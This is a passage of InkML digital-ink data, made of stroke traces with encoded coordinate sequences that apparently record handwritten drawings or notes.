27-15,-26 26 16,14-14 0,-1-12-1,40-14 1,-26 0-1,-14 40 1,27-26 0,-14 26-1,-12-27 1,12 27 0,1 13-1,-1-26 1,1 13-1,-1 0 1,27-40-16,-13 26 16,13-12-1,-13 26 1,0-40-16,13 0 16,0 14-16,0 26 15,0 0 16,0-14-15,0-12 0,0 12-1,0-12 1,13 13 0,0-14-1,0-26 1,1 40-1,12-14 1,-26-13-16,13 1 16,14-1-1,-14 13 1,0-12 0,-13-1-1,40-13-15,-40 13 16,13 0-16,0 0 0,53 14 31,-13-14-15,13-13-1,27 0 1,-53 0 0,-1 0-1,-25 0-15,-1 0 0,0 0 16,0 0 15,1 0-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="188345.17">7818 12144 0,'0'-13'94,"-39"-172"-78,-27-66-1,26 12 1,27 67 15,-1 27-15,14 118-16,0-39 16,0 53-16,0-66 15,0 52-15,0-39 16,0 40-16,0-54 15,0-39 1,0 106-16,0-27 16,0-26-1,0 0 1,0 40-16,0-1 16,0-26-16,27 27 15,-14 13 1,27-1-1,0 1 1,12-13 15,-38 26-31,-1-14 0,27 14 16,12-26 0,1 26-1,66 0 1,-92 0-16,39 0 15,159 0 1,-93 0 0,-79 0-16,-13 13 0,39 14 15,106-14 1,-158-13-16,13 0 16,52 0-16,54 0 15,-107 0-15,94 0 16,-80 0-1,0 13-15,39 14 0,239 65 16,-106-39 15,-27 0-15,-26-27 0,-40-12-1,-92-1-15,-13-13 0,65 13 16,54-13-1,-27 0 1,-13 0 0,-80 0-16,40 0 15,-53 13-15,14-13 0,-1 14 16,107-14 0,-1 0-1,13 26 1,-12 0-1,-120-26 1,27 0-16,-1 0 0,-12 0 16,52 27-1,-26-27 1,-40 0-16,1 0 0,25 0 16,67 0-1,-93 0-15,53 0 16,40 0-1,-26 0 1,-54 0-16,-13 0 0,14 0 16,39 0-1,-53 0-15,40 0 16,-26 0-16,39 0 16,172 13-1,-132 0 1,-67-13-16,-12 0 15,13 0-15,79 0 16,-93 0 0,14 0-1,-1 0 1,-12 0 0,-14 0-16,27 0 15,66 0 1,-80 14-16,1-14 0,12 0 15,133 26 1,-66-13 0,-79-13-16,39 27 15,0-27 1,-53 0-16,40 0 16,66 0-1,-93 0 1,41 0-16,-54 13 0,27-13 15,132 26 1,-146-26 15,27 0-15,-40 0-16,40 14 16,13-1-1,-39-13-15,-1 0 0,27 0 16,66 40-1,-66-40-15,0 13 0,53 0 16,-80-13-16,-13 0 16,14 13-16,-1-13 0,-26 14 0,40-14 15,-14 13 1,1 0 0,-14-13-1,-13 13 188,172 80-187,-159-67 0,54 1-16,65 26 15,-106-40 1,40 27-16,14-14 31,-41 14 0,-25-40-31,-1 0 0,-13 26 141,0 14-125,0-14-1,0 14 1,0-14-1,-13 41 1,-14-28 0,-39 14 15,26-13-15,1-14-1,39-12-15,-13-14 0,-1 13 16,-25 13-1,25-26-15,-25 27 16,12-14-16,-12 13 16,-28 1-1,1-14 1,40 0-16,-1 1 0,14-14 16,-13 13-16,-93 0 15,26-13 1,-39 13 15,92 0-31,-53-13 31,80 0-31,-13 0 0,-1 14 16,-105-1 0,92 0-16,-39 0 15,-14 1 1,54-14-1,25 0-15,-39 26 16,-39-26 0,52 13-16,-13-13 0,-66 14 15,66-14-15,-79 13 16,-40-13 0,132 0-16,-66 0 15,80 0-15,-67 13 16,67-13-16,13 0 15,-53 13-15,39-13 16,-26 13-16,27-13 16,-14 14-16,14-14 0,-93 13 15,66 0-15,13-13 0,-13 0 16,-119 27 0,146-27-16,-54 13 15,-52 0 1,92-13-16,14 13 15,-67-13 1,53 0-16,1 0 0,-27 0 16,-80 0-1,93 0-15,-53 0 16,80 0-16,-14 0 0,-13 0 16,14 0-16,-1 0 0,27 0 15,-40 14-15,13-14 16,-39 13-16,39-13 0,-26 13 15,39-13 1,-12 0-16,-14 0 0,-106 0 31,119 0-31,14 0 0,-53 0 16,52 0-16,-79 0 16,-52 0-1,78 0 1,1 0-1,52 0-15,1 0 0,13 0 16,-1 0-16,1 0 0,-13 0 16,12 0-16,-12 0 15,-14 0 1,14 0 0,-1 0-1,14 0-15,-13 0 31,-14 0-15,40 13 15,-13-13-15,0 0-16,-1 0 31,1 0-15,0 0 15,0 0 32,-1 0-48,-12 0 1,13 0 15,-14 0-15,14 0 952,-40-26-952,13 26 15,40-13-31,-13-1 0,0 14 16,-27 0 78,-13 0-79,0 0 1,-26 0 0,26 0-1,-13 0 1,26 0-16,-13 0 15,-52 0 1,-1 0 0,-13 0 15,13 14-15,-13-14-1,92 0-15,-12 0 16,-27 0-1,52 0-15,-25 0 16,-14 0 0,13 0-1,27 0-15,-14 0 16,1 0 0,13 0-16,-1 0 0,1 0 15,-13 0 1,-27-27-1,40 27 1,-1-13-16,1 13 31,0 0-15,0 0 0,-14 0 30,1 0-30,-1 0 0,1 0-1,13 0 126,-14 0-125,14 0-1,0 0 1,-1-13 234,1 13-235,-13 0 1,-1 0 0,14 0-16,0 0 15,-14 0 1,14 0-16,0 0 16,0 0-1,-1 0 1,1 0-1,0 0 110,0-14-109,0 14 265,-27-13-265,27 13-16,-40 0 16,26-13-1,-12 0 1,12-1-1,14 14 1,0 0 140,-40 0-140,26 0-16,14 0 16,-13 0-1,12 0-15,-12 0 16,13 0-1,-1 0 1,1 0 31,0 0-31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="188547.47">7792 12091 0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2:58:48.4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20:02:52.1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3201 2143 0,'-132'13'15,"264"-26"-15,-290 53 16,171-40 109,80 0-109,-27 0-16,185-53 15,80 13 1,-278 27-16,53 0 16,-1 13-1,-91 0-15,25 0 16,-12 0-16,12 0 15,-25 0-15,65 0 16,80-27 0,-93 27-16,13 0 15,67 0-15,65-13 16,54-13 0,-53 26-1,-146 0 1,-13 0-16,26-14 0,-39 14 15,-27 0-15,27-13 16,-27 0 0,13 13-1,41-27 1,-41 14-16,1 13 16,-1 0-16,53-13 15,-65 0-15,-1 13 0,0 0 16,0 0-16,0 0 15,-13-13 32,0-54-31,0 41-16,0-14 16,0 27-16,0-133 0,-52-145 15,-1 133 1,53 105-1,-14 0-15,-12-27 16,-27-52 0,53 93-16,-13 12 0,0-13 15,-1 14-15,14 13 0,-13-14 16,-13-26 0,26 40-16,-27-13 15,1-14 1,-27-13-1,40 53-15,-1-13 0,-12-14 16,-80-26 0,80 53-16,-41-26 15,-131 13 1,-93 13 0,238 13-1,-92 0-15,52 0 0,27 1 16,0-1-16,-67 0 0,-184 27 31,105-1-15,27 1-1,145-40-15,14 0 0,-54 13 16,54-13-16,0 0 0,-1 14 16,1-14-16,-54 13 15,-26 0 1,80 0-16,-14 1 15,27-14-15,-27 39 79,40 41-64,0-41-15,0-12 0,-13-14 16,13 13-16,-13 358 15,13-278 1,0-80-16,0 67 16,0-53-16,0 92 15,0-106-15,0 27 0,0-13 0,0 13 16,40 145 0,-27-39-1,27-40 1,-27-92-16,-13-14 0,13 13 15,-13-12-15,0 12 16,26-13 140,-12-13-140,25 0 0,-12 0-1,-14 0-15,0 0 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3687.65">3585 2871 0,'0'39'79,"0"54"-64,0-67-15,0 1 16,0-14-16,0 27 0,0 0 15,0-14-15,0 27 16,0 66 0,0-106-16,0 27 15,0 0 1,0-27 62,0 0-62</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4216.3">4008 2831 0,'14'0'16,"-14"79"30,-14 160-30,1-200 0,13 94-1,0-67 1,0-53 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4887.22">4405 2752 0,'0'105'63,"0"1"-47,0-66-16,0 53 15,0 65 1,0-131-16,0 52 15,0 1 1,0-28 0,0-38-16,0 12 15,0 14 17,0-27-32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7128.73">4987 2117 0,'0'0'0,"-53"26"16,40-13-16,-13-13 16,-1 14-16,1-1 0,-67 0 15,67-13-15,-1 13 16,-26-13-16,27 13 0,-212 14 16,53-1-1,171-26 1,1 14-16,-13-14 0,-27 0 31,40 0-31,-27 0 16,13 0-16,14 0 0,-40 26 15,-172 27 1,133-40-16,-80 14 16,119-27-16,-79 0 15,79 0-15,13 0 0,-39 0 16,-14 0-1,80 0-15,0 0 0,-1 0 16,1 0 0,-13 13 109,-1 0-110,-39 0 1,13 14 0,40-1-16,-14 1 15,1 12 1,26 14-1,-13 40 1,13-67-16,0 41 16,0-41-16,0 93 15,0 132 1,13-224-16,0-1 31,-13 27-15,0 53 15,0-40-15,0-53-16,13 1 0,1 25 15,-14 14 1,0-39-16,0 38 16,13 1-1,-13 0 1,0-13-1,0-27-15,0 0 94,106 67-78,-80-80-16,1 26 15,-1-12-15,53 38 16,14 1 0,264 40-1,-211-53 1,26-27 0,-146-13-16,14 0 0,0 0 0,13 0 15,-27 0-15,67 0 16,92 0-1,-146 0-15,81-40 16,-81 27-16,94-13 16,-120 26-16,66-14 15,-52 14-15,-1 0 16,0-13-16,14 0 16,26-27-1,-39 27 1,39-27-16,-40 14 15,54-27 1,-41 26-16,-12 1 0,52-14 16,-13-26-1,-52 53-15,-1-27 16,0-66 0,-13-39-1,0-1 1,0 107-16,0-54 15,-13-13 1,13 80-16,0-1 0,0-12 16,-13 25-16,-1 1 15,1 0-15,13-27 0,-39-13 16,12 0 0,-13 0-1,40 40 1,-26-13-16,26 13 15,-13 13-15,-1-14 32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8034.28">5993 3453 0,'0'0'0,"0"-13"16,-13 13 249,-1 0-140</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8199.07">5966 3440 0,'-13'0'93,"0"0"-77</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26435.19">3850 5913 0,'-14'0'47,"1"0"-32,0 0-15,0 0 0,-14 0 16,-118 0-1,132 0-15,-40 27 16,-27-27 0,41 0-1,-41 0 1,27 0 0,-13 0-1,53 0 1,-14 13 46,1-13-46,0 0 0,12 0-1,1 0 48,0 0 30,-53 27-77,52-14 0,-12 13-1,26 1 1,-13-1 0,13 1-1,0 26 1,0-40-16,0 0 0,0 0 15,0 14 1,0-14-16,0 0 16,0 0-16,0 27 15,0-27-15,0 1 16,0 25 0,26 14-1,-13-13 1,-13 0 15,14-14-15,-1 14-1,0-27 1,0 0 0,1 14-1,-1-14 1,0 0-16,-13 0 0,13 40 31,14-26-15,-27-14-16,0 0 15,53-13 79,-14 0-78,-12 13-16,-1-13 0,27 14 15,-26-14-15,52 13 16,40 13 0,-40-26-1,27 0 1,-53 0-1,-13 0 1,0 0 0,26-39-1,-53 39 1,27-27-16,-27 27 16,0 0-1,27-40 126,-27 14-126,0-27 1,1 0 0,-1 13-1,0 1 1,-13 26 0,0-1-16,0 1 0,0-40 15,0 40 1,0-14 15,0 14-31,0 0 16,0 0-16,0-14 15,0 14-15,0 0 16,0-40 0,0 40-1,0-1 1,0-25 46,0 26-46,0-1 0,0 1 46,-40-53 172,-26-27-218,66 80 0,-26-40-1,12 40-15,1 0 16,13-14 0,-13 27 187,-13 0-188,-80 0 1,0 14 0,66-1-16,0 13 15,14-26 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="36015.25">10054 5808 0,'0'0'0,"-40"0"15,14 0-15,13 0 16,-14 0-16,1 0 16,52 0 202,-12 0-202,52 0 0,-13 13-1,-40 0-15,40-13 16,-27 13-16,1-13 0,39 27 15,66-27 1,67 13 0,-173 0-16,14-13 15,13 0-15,-27 0 0,14 0 16,-14 0-16,-13 0 16,27 0-1,26 27 32,-52-14-16,-1-13 204,-26 0-1,-40 0-218,39 0-16,-65 0 15,-27-13 1,93 13-16,-106-27 16,92 27-1,14 0 1,0 0 15,-27 0-15,14 0-16,-14 0 15,-39 0 1,13-26 0,13 13-1,39 13 1,1 0-16,0 0 31,0 0-15,0 0-16,-27-14 15,13 14 1,-12-13 0,39 0 140,106 13-141,-54 0-15,-12 0 0,13 0 16,93 0 0,-94 0-16,1 0 0,0 0 0,27 0 15,105 0 1,-132 0-16,119 40 16,92 26-1,-184-53-15,92 13 16,0-12-1,-119 12 1,-40-26 0,27 0 46,-1 0-46,-26 0 15,27 0 0,40 0-15,-54 0-16,-13 0 0,53-13 16,53-14-1,-13 1 1,-13-14-1,-80 40-15,0 0 16,1 0-16,12-13 16,0 13-1,-12-13-15,25 13 16,1 0 0,-27 0-1,27 0-15,13 0 16,-27 0-1,14 0-15,53 0 32,-40 0-17,-1 0 1,28 0 0,26 0-1,-80 0-15,133 0 16,-66 0-1,-54 0-15,54 0 16,52 0 0,-105 13-16,92 27 15,-92-27-15,106 40 16,-107-40-16,54 13 16,-54-26 15,-25 0-31,25 0 62,-25 0-46,-1 0-16,0 0 16,27 0-1,-14-26 1,1 26 31,12-13-32,-12 0 1,-1-14 0,-12 1-1,25-27 1,14 13 15,0-53-15,-13 41-1,-27 12 1,-13 0 0,0 14-1,0-14 1,0-26-1,0 13 1,0 26 0,0 1 15,0-14-15,0 27-1,0 0 1,0 0 15,0-1 16,0-12-31,0 13-16,0 0 15,0-1 1,0 1 15,0-13-15,0 12-16,0-12 15,0-14 1,0 14 0,0 13-1,0-1 1,0 1 62,0 0-62,-13 0-16,-40-27 15,40 40-15,-67-13 16,-356-14-1,237 27 1,14 0 0,53 0-1,-14 0 1,107 0-16,12 0 16,-52 0-16,52 0 0,-26 0 15,14 0-15,12 0 0,-26 0 16,0 0-16,-119-26 0,-39-1 31,158 14-31,-146 0 16,14 0-1,93-14 1,52 27-16,27 0 0,-80-26 16,-13-1-1,-39 1 1,-27-14-1,132 40-15,-119-26 16,80 26 0,-14-27-1,67 27-15,-54 0 16,-12-13 0,79 13-16,-67 0 15,-12 0 1,78 0-1,-12 0-15,-14 0 0,27 0 16,0 0-16,-27 0 16,-39 0-1,65 0-15,-52 0 16,-40 0 0,14 13-1,65-13-15,-12 0 16,-14 27-1,0-27 1,-26 26 0,52-13-16,-52 1 15,-27 38 1,66-38 0,0-14-16,27 13 0,-26-13 0,-41 26 15,67-26 1,-40 14-16,-13 12 15,13 1 17,40-27-32,0 0 15,-1 13 32,-25 13-31,39 1-16,-14-14 0,1 27 15,-27 52 1,27-79-16,0 40 16,-27 80-1,27-41 1,13-26 0,0-26-1,0-13 1,0-1-1,0 0 17,0-12 15,27 25-32,-14-39-15,0 14 0,-13-1 16,0 0-16,26 14 15,-12-27 1,-14 13-16,13 40 94,13-27-63,-12-13-31,-1 1 16,-13-1-1,13 0-15,14 0 110,-14 1-95,26 12 1,-12-26 0,-27 13-1,40 0 1,-27 1 15,27-1-15,-27 0-16,26-13 15,-12 13 1,13 1 0,-14-14-1,0 0 1,14 0-1,-27 13-15,1-13 16,-1 0-16,0 0 16,14 0-1,-14 0-15,13 0 16,-13 0-16,27 0 16,40 0-1,-14 0 1,26-40-1,-65 27 1,26 0 0,0-1-1,-40 1 1,0 13-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38243.51">7607 3268 0,'-13'0'62,"13"-80"-31,0 54-31,-14 13 0,14-27 0,-13 13 16,13 14-16,0-119 16,0-172-1,0 145 1,0 132-16,27-78 16,-1 12-1,0 27 1,-26 53-16,14-14 15,-14 1-15,26-40 16,1 26 0,-27 27-16,13-40 15,0 53 1,14 26 93,-1 106-93,-13-79-16,14 106 16,-1 119-1,14-119 1,-27-67-1,-13-65-15,0-14 16,106 53 218,-80-53-140</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="39315.24">7686 2527 0,'40'0'140,"52"13"-124,-78-13-16,12 0 31,-13 0-15,-39 0 140,-1 13-125,14-13-31,0 0 0,0 0 0,13 13 32,-13-13 30,-14 14-46,14-14-16,-14 0 0,1 0 15,-14 0 1,27 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="40031.57">8731 2580 0,'0'-14'16,"13"14"-1,1-13 17,52 13-17,-40 0-15,-12 0 0,12 0 16,0 0-1,-12 0 1,-67 13 62,-27 1-62,67-14-1,0 0-15,0 13 0,-1 0 32,1-13 77,-26 0-93</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="40648.83">9181 2117 0,'0'13'47,"0"40"-32,0-40-15,0 40 16,0 0-1,0-27-15,0-12 0,0 25 16,13 1 0,1 26-1,-14-26 1,0-27 0,13 0-16,-13 0 15,0 40 1,13-39-1,-13 12-15,0-13 32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="41476.87">9181 2051 0,'0'0'0,"0"-14"141,106 14-125,13 0-1,0 0 1,-106 0-1,14 0-15,-1 0 0,1 14 32,-14-1-32,13 13 15,1 1 1,-27-14 0,0 0-16,0 14 31,0-1-16,0 0 1,0-12 0,-27-14 62,-12 0-63,25 0-15,-12 0 32,13 0-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="42229.97">9274 2514 0,'26'0'141,"40"0"-126,0-14 1,-26 1 0,-40-13 77,-13 26-77,-40 13 0,0 0-1,0-13 1,40 0-1,0 0 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44105.08">7911 3929 0,'0'-93'78,"26"27"-62,-12 40-16,-14 13 0,26-40 15,40-13 1,-39 26 0,-14 27-1,-13-1 32,13 14-31,14 0-1,39 14 1,-26 12 0,-1 1-1,-39-14-15,13 0 0,1 0 16,-1 40-1,0-13 1,-13 13 0,0-40-16,0 40 15,-13-53-15,0 53 16,13-40-16,-14 14 16,-25 12-1,26-39 1,-14 27-1,1-14 17,-1-13-17,14 0 110,-53-13-109,26-14 0,40 14 46,-13-13-46,-14-27-1,1 26 1,26 14 78,0-14-79,0-25 1,0 25 0,0 14-16,0 0 15,0-14 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44915.42">9287 3638 0,'-146'40'16,"292"-80"-16,-384 106 16,211-66-16,-12 27 15,25-27 1,120 0 109,-26-27-109,-41 14-16,80-14 15,-79 1 1,-27 26-1,-26 0 79,-53 26-78,39-26-1,14 0 32,-13 0-31,13 0-16,-27 0 16,27 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="45867.95">9869 3069 0,'0'13'32,"0"40"-17,-13-26-15,-1 65 16,14 41-1,0-1 1,0-79-16,0 66 16,0 79-1,14-145 1,-14-39 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="47131.25">9895 3201 0,'-26'0'0,"13"0"0,52 0 0,-92-13 15,40 13-15,0 0 0,-27-13 31,1 0-15,25 13-16,-12 0 16,13 0-1,0 0 1,-1 0-16,1 0 16,-27 0-1,27 0 1,-13 13-16,-14 0 31,27 0-31,0 1 16,13-1 77,0 13-77,0-12 0,0 25-1,0-25-15,0-1 16,26 13 0,-13 1-1,0-27 16,1 0 32,39 0-47,-27 0-1,27 0 1,-40 0-1,14 0 17,-1 0-17,-13-14 1,14 1 0,-14 0-1,0 13-15,0-13 0,14 13 16,-14 0-1,0 0 79</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="49711.91">10385 4141 0,'0'0'0,"-27"-13"16,-118 13-1,-120 26 1,186 14-16,-119-1 15,145-25-15,-146 38 16,133-38-16,-119 12 16,-119 1-1,65-14 1,41-13 0,158 0-1,-92 0-15,-53 0 16,13 0-1,145 0 1,-26 0-16,14 0 0,12 0 16,-145 0-1,119 0 1,40 0 0,0 0 30,-93-13-30,66-1 0,14-12-1,13 13-15,-14-1 16,1-12 0,13-27-1,-40-39 1,53 78-1,-14-25-15,-25-160 16,12-79 0,-12 27-1,12 79 1,27 53 0,0 26-1,0 67-15,0-54 16,0-39-1,0 80-15,0-133 16,0 26 0,0 93-16,27-92 15,-1-14 1,14 14 0,-40 118-16,13-26 15,-13 27-15,0-14 0,0-106 16,0 67 15,13 79-31,-13-13 0,0 0 16,27-27-1,-27 14 1,39-27 0,-39 39-16,14-12 0,25-14 15,67-39 1,-13 26-1,237 0 1,-131 27 0,-173 26-16,40 0 0,93 0 15,66 0 1,-13 0 0,-146 0-1,106 0-15,53 0 16,-27 52-1,-171-52 1,26 14-16,13-14 16,-40 0-16,80 13 15,-40 0 1,-39 0 0,26 14-1,-40-27-15,0 0 0,40 13 16,-40-13-16,14 13 0,12-13 15,107 40 1,-133-27-16,53 14 16,-26-27-1,-14 0 1,-26 13-16,27 0 16,-14 67-1,-13-54-15,0 93 16,0 66-1,0-145 1,0 39 0,0-26-1,0-40-15,0 1 16,27 65 0,-27-66-16,13 40 15,0 13 1,13 40-1,14 0 1,-27-93-16,27 133 16,39 132-1,-79-252 1,0-13-16,14 27 0,25 39 16,-39-65-1,0 25-15,0 1 16,0-27-1,0 14-15,0-14 16,0 13-16,0 14 16,0 66-1,0-53 1,0 53 0,0-80-16,0 27 15,0 79 1,0-119-16,0 14 15,0 13 1,-13-40 31,-40 39-31,40-25-1,0-1-15,-14 13 0,-26 40 16,40-52-1,0-1 17,0 0-17,-14 14 1,14-27-16,0 13 0,0 0 0,-1-13 16,-65 26-1,13-12 1,0-1-1,-14 0 1,-12 27 0,52-40-1,13 0 1,-25 26 234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20:04:04.3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7422 8864 0,'-40'0'78,"-13"0"-63,53 13-15,-40 0 16,14-13-16,-67 13 16,40-13-1,0 0 1,27 0-1,13 0-15,-1 0 0,1 0 16,-26 0 0,-1 0-1,27 0-15,-40-26 16,-40 13 0,67-1-16,-27-12 15,-13 26 1,-14-13-1,54 13 1,-14 0-16,-53 0 31,67 0-31,-53 0 16,12 0 0,1 0-1,53 0-15,-27 0 16,14 0-1,-14 0 17,1 0-17,12 0 1,1 0-16,-1 0 0,-12 0 16,25 0-16,-39 0 31,0 0 0,40 0-31,-13 0 31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1230.16">9446 8824 0,'-27'0'32,"-145"26"-17,159-26 1,-13 14-16,-1-14 0,-39 13 15,53-13 1,-14 0-16,-12 0 31,39 13-31,-14-13 0,-25 0 16,-54 0 0,80 0-16,-14 0 0,-12 0 15,-107 0 1,93 0-1,13 0 1,14 0 0,13 0-1,-14 0 1,1 0 15,-14 0-15,40-13-1,-13 13-15,-13-13 0,-27-1 16,39 14 0,-25 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2078.48">11324 8916 0,'-66'27'47,"-212"-14"-31,212-13-16,0 0 0,-27 0 16,54 0-16,12 0 0,-13 0 15,-12 0 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2795.31">13004 8824 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3567.23">15677 8903 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4175.07">17542 8864 0,'0'0'16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4774.82">19791 8811 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5383.69">22040 8969 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11900.47">22767 8837 0,'-26'0'94,"-40"0"-79,39 0-15,14 0 16,-13 0-16,-54 13 16,-39 1-1,93-1-15,-40-13 16,-1 0 0,54 0-16,0 13 15,-13-13 1,-14 0-1,-26 13 17,52-13-32,-12 13 0,-14-13 15,14 14-15,-27-1 16,40-13-16,-27 0 16,27 0-16,0 0 0,-1 0 0,14 13 15,-39 0 1,12-13-1,-39 0 1,26 0 0,1 0-1,12 0-15,-12 0 16,-14 0 0,-14 0-1,1 0 1,40 0-1,-199 0-15,40-26 16,52 26 15,14 0-15,93 0-16,-27 13 16,27-13-16,-14 13 15,-39 14 1,65-27-16,-12 0 0,-27 0 15,-40 0 1,-65 26 0,91-26-16,-12 14 0,-14-14 15,67 0-15,-80 0 16,40 0 0,40 0-16,-54 0 15,-39 0 1,79-14-1,-65-12-15,65 26 16,0 0-16,-13-13 16,-105-14-1,118 27-15,-66-26 16,80 26-16,-94-14 16,-65-12-1,132 26-15,-92-13 16,-93-14-1,172 27-15,-93 0 16,-40 0 0,160 0-16,-80 0 15,26 0 1,67 0-16,-41 0 16,-25 0-1,52 0-15,0 0 16,-92 0-16,-13 0 15,-107 0 17,199 0-32,27 0 0,-67 0 15,-13 0 1,67 0-16,26 0 0,-40 0 16,39 0-16,-65 0 15,-80 0 1,120 0-16,-1 0 0,-39 0 15,-93 14 1,13-1 0,119-13-16,0 0 0,-26 13 15,-92 0 1,25 0 0,27-13-1,67 0 1,-67 0-16,66 0 15,-39 0-15,-53 0 32,79 0-32,13 0 0,-26 0 15,-186 0 1,213 0-16,-14 0 0,0 0 0,0 0 16,27 0-16,-107 0 15,-52 0 1,145 0-16,-13 0 0,-13-13 15,-92-13 1,65 13 0,-13 13-1,93 0-15,-80 0 16,-39 0 0,92 0-16,14 0 15,-14 0-15,-66 0 16,67 0-16,25 0 15,-39-14-15,14 14 16,-14 0 15,13 0-15,14 0 0,-14 0-1,27 0-15,0 0 0,-40 0 16,-27 0-1,41 0 1,-28 0 0,54 0-16,-26 0 15,-1 0 1,27 0-16,-27 0 16,-13 0-1,27 0 1,-54 0-16,-79 0 15,120 0 1,12 0-16,-26 0 16,14 0-16,-14 0 0,-53 0 15,79 0-15,-65 0 16,-27-39 0,13 12-1,-13-13 1,92 27-16,1 13 0,-27-26 15,-53-1 1,93 27-16,0 0 0,-27 0 16,-26-26-1,13 26 1,0-13 0,-13-1-1,53 14-15,-14 0 16,-65 0-1,78 0 1,-52 0-16,-13 0 31,52 0-31,-25 0 16,38 0-16,-12 0 0,-1 0 0,14 0 16,-79 0-1,-14 0 1,13 0-1,-52 0 1,92 0 0,26 0-16,14 0 0,-13 0 15,12 0-15,-12 0 0,-40 0 16,0-13 0,39 13-1,-39 0-15,-53 0 16,0 0-1,106 0 1,-14 0-16,-26 0 16,27 0-16,-1 0 0,-39 0 15,-26 0 1,25 0 0,28 0-16,-41 13 15,54-13-15,-14 0 0,1 0 0,12 0 16,-26 0-16,-106 0 15,-13 0 1,40 0 0,-27 0-1,14 0 1,39 14 0,66-14-16,1 13 15,-41 0-15,41 0 0,-80 1 16,-93-1-1,159 0 1,26-13-16,-39 13 16,-53 14-1,13-27 1,67 0-16,12 0 0,1 0 0,-14 0 16,27 13-16,-27-13 0,-26 26 15,-13-26 1,13 0-1,52 0-15,-25 0 16,25 0-16,-52 0 16,-53 0-1,93 0-15,-14-13 16,-13 0-16,-66 0 16,93 13-1,-27-14-15,39 14 16,-12-13-1,26 0 32,-13-93-31,0 93-16,-14-53 16,1-14-1,-1 28 1,14 12-1,0-13 1,13 13 0,0-13-1,0-13 1,13-66 0,0 105-16,0 1 15,14-14-15,26-79 16,-40 80-1,53-28 17,-39 54-32,26-13 15,39-27 1,-79 40-16,14-1 0,13 14 16,-14 0-16,53 0 15,186 0 1,-172 0-16,145 27 15,198 52 1,-303-66-16,224 54 16,40-15-1,-305-38-15,120 25 16,105 27 0,-264-66-1,13 27-15,1-27 0,-15 13 0,345 40 31,252 26-15,-279-26 15,-304-39-31,93-1 16,-27 27 0,-105-27-16,12 0 0,41 13 15,-54-12-15,106 12 16,-105-26-16,13 0 0,26 13 15,66 1 1,-79-14 0,-13 0-1,-14-27 1,1 14 0,-27 0-16,39-1 15,27-12 1,-39 13-1,-14 0-15,53-27 0,27-26 16,-80 39 0,53-12-1,-39 12-15,39-26 16,-13-13 0,-27 66-16,27-66 15,79-40 1,-105 93-16,65-40 15,-65 26-15,39-12 16,-53 26-16,14-1 16,26-39-1,-27 53-15,27-39 16,-40 39-16,1 0 0,25-14 16,54-12-1,-14 26 1,53-26-1,-92 26 1,53 0-16,-67 0 16,80 0-1,185 0 1,-40 52 0,14-25-1,-199-14-15,-13 0 0,66 1 16,-66-1-16,-13-13 0,79 26 15,-13-26 1,105 27 0,41-1-1,65 14 1,-224-27-16,-14 0 16,53 1-16,-65-14 0,12 0 15,14 0-15,-54 0 0,54 0 16,79 0-1,-13 0 1,92 0 15,-198-14-31,185-12 16,13-27 0,-171 40-16,52 0 15,0-1 1,-105 14-16,26 0 15,79-26 1,-92 26-16,145 0 16,106 0-1,-198 0-15,-27 0 0,159 0 16,-14 0 0,-92 0-1,-92 0 1,52 0-16,-52 0 15,12 0-15,107 0 16,383 0 15,-384 0-15,-52 0 0,-80 0-16,27 0 15,-27 0-15,40 0 16,40 0-1,-67 0-15,-13 0 0,212 0 16,-39 0 0,-107 0-1,-53 0-15,14 0 16,-27 0-16,1-13 16,52 13-1,-40 0 1,-13-14-16,27 14 0,26-13 15,40 13 17,0 0-17,13 0 1,-93 0-16,67 0 16,119 0-1,-107 0 1,-12 0-1,-53 0 1,13 0 0,-27 0-1,1 0 1,-14 0-16,0 0 0,93 0 16,13 13-1,-13 27 1,13 13 15,-106-53-31,27 26 31,-1 41-15,-39-41-16,80 53 16,-54-52-16,40 52 15,-52-52-15,39 52 16,-40 0-1,-13-65-15,13-14 0,-13 13 32,26 13-17,1 1-15,-1-1 16,1 1 0,13-1-1,-27-26 1,26 27-1,-25-27 1,65 92 0,-52-65-1,-14-27-15,13 26 16,1-13 15,-14 1 0,0-1 141,-13 27-156,0-27-16,0 0 16,0 13-1,-13 1 1,-14-1-1,14-12-15,0-1 16,0 27 0,0-40-16,-1 13 15,-12 26 1,-1-25 0,27-1-16,-13-13 15,0 0-15,-53 40 